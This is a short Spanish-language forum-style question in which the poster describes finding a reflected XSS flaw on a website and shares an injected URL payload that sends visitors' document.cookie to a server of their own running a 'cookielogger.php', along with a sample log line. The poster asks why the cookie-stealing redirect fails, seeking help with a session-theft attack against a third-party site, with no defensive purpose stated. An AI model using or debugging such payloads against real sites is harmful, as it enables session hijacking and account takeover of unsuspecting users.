Acabo de encontrar un sitio web con una vulnerabilidad XSS. Cuando visito la siguiente URL, aparece una ventana emergente:
https://example.com/article/HALLOWEEN"><script>alert(1);</script>
Tengo un cookielogger.php en mi servidor con este código , de modo que cuando visito myserver.com/key.php , se agrega una línea a myserver.com/log.txt gusta esto:
IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST: | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD: | REF: | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:
Pero cuando modifico mi URL a esta a continuación, la cookie no se registra en mi servidor
https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>